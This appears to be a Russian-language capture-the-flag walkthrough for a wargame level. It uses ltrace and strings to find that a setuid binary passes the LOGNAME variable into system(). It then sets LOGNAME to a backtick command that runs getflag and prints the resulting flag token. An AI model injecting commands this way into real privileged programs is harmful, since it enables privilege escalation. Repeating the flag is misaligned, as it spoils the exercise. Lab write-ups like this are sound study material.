1) ls 
level07

2) ./level07 
level07

3) ltrace ./level07 
__libc_start_main(0x8048514, 1, 0xbffff7f4, 0x80485b0, 0x8048620 <unfinished ...>
getegid()                                                                                                                         = 2007
geteuid()                                                                                                                         = 2007
setresgid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280)                                                                               = 0
setresuid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280)                                                                               = 0
getenv("LOGNAME")                                                                                                                 = "level07"
asprintf(0xbffff744, 0x8048688, 0xbfffff4f, 0xb7e5ee55, 0xb7fed280)                                                               = 18
system("/bin/echo level07 "level07
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                                                            = 0
+++ exited (status 0) +++


Наблюдаем, что используется переменная окружения LOGNAME

4) strings ./level07 

Можем наблюдать следующее:

========
LOGNAME
/bin/echo %s 
======

Делаем предположение что в echo передается LOGNAME from env

5) export LOGNAME=\`/bin/getflag\`

6) Пробуем ./level07

Check flag.Here is your token : fiumuikeil55xe9cu4dood66h

